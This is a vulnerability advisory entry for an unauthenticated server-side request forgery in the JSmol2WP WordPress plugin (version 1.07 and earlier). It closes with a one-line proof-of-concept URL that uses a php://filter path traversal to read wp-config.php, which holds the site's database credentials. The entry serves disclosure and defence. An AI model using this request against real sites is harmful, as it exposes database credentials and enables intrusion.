JSmol2WP <= 1.07 - Unauthenticated Server Side Request Forgery (SSRF)

2019-01-08T00:00:00
ID WPVDB-ID:9197
Type wpvulndb
Reporter Ryan Dewhurst
Modified 2019-11-01T00:00:00

Description

WordPress Vulnerability - JSmol2WP <= 1.07 - Unauthenticated Server Side Request Forgery (SSRF)

PoC

http://localhost:8080/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call;=getRawDataFromDatabase&query;=php://filter/resource=../../../../wp-config.php